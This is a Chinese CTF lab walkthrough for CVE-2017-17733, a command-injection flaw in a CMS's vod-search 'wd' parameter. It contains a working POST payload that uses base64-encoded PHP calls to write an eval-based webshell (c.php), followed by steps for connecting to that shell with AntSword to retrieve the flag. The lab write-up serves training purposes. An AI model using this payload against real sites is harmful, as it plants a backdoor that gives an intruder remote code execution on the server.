春秋云境CVE-2017-17733

1.阅读靶场介绍

这里可以给各位讲一下自己的愚见

就是涉及这些字眼的靶场介绍"远程攻击者可借助index.php?m=vod-search请求中的'wd'参数利用该漏洞执行命令。"

简单来说就是:关于路径还有攻击参数的

我们都可以直接使用hackbar这种形式的工具去完成webshell

2.启动靶场

我们会得到一个如下的页面

接下来就是去攻克他了,其实也是一个很简单的步骤

3.poc

我们对页面点击F12

然后输入这个url

https://eci-2zedfyzgnxg3tgaoyz2u.cloudeci1.ichunqiu.com:80/index.php?m=vod-search

再post这个参数

wd={if-A:print(fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29)}{endif-A}

这里的意思就是发送一个参数给这个url

文件是c.php,内容是c(密码)

这里我们可以去访问一下
https://eci-2zedfyzgnxg3tgaoyz2u.cloudeci1.ichunqiu.com:80/c.php

这就说明上面的所有步骤都是成功的

好啦接下里就是中国蚁剑启动

输入完如上的数据后,点击测试后添加

进去就是这个页面哟

flag就在你们面前了

恭喜各位彦祖和亦非们又攻克一个靶场了

感谢你们宝贵的时间

相关推荐
Chengbei112 分钟前
SoloXSS:一款现代化的自托管 XSS平台
人工智能·安全·web安全·网络安全·自动化·xss·安全架构
white_ant1 小时前
安全认证与 API 网关
安全
xixixi7777711 小时前
三大 AI 安全里程碑:Akamai 高危风险预警、智能体水印强制落地、PQC 量子安全全产业链统一
大数据·人工智能·安全·ai·大模型·智能体·政策
hz5678913 小时前
电子远程评标系统哪家好?安全、合规、易用平台评测指南
安全·云计算·音视频·实时音视频·信息与通信
MartinYeung514 小时前
[论文学习]大语言模型安全综述:攻击、防御、对齐、度量与护栏的深度解析
学习·安全·语言模型
2301_7803039014 小时前
网络安全、自动化运维、ERP、CRM、MES
运维·web安全·网络安全·自动化·安全威胁分析
学逆向的15 小时前
汇编——内存
开发语言·汇编·算法·网络安全
卓豪终端管理16 小时前
企业数据防泄漏:现代设备控制如何成为终端安全的关键防线
安全
技术不好的崎鸣同学18 小时前
[GXYCTF2019]Ping Ping Ping 思路及解法
网络·安全·web安全
dehuisun18 小时前
等保2.0实施方案
web安全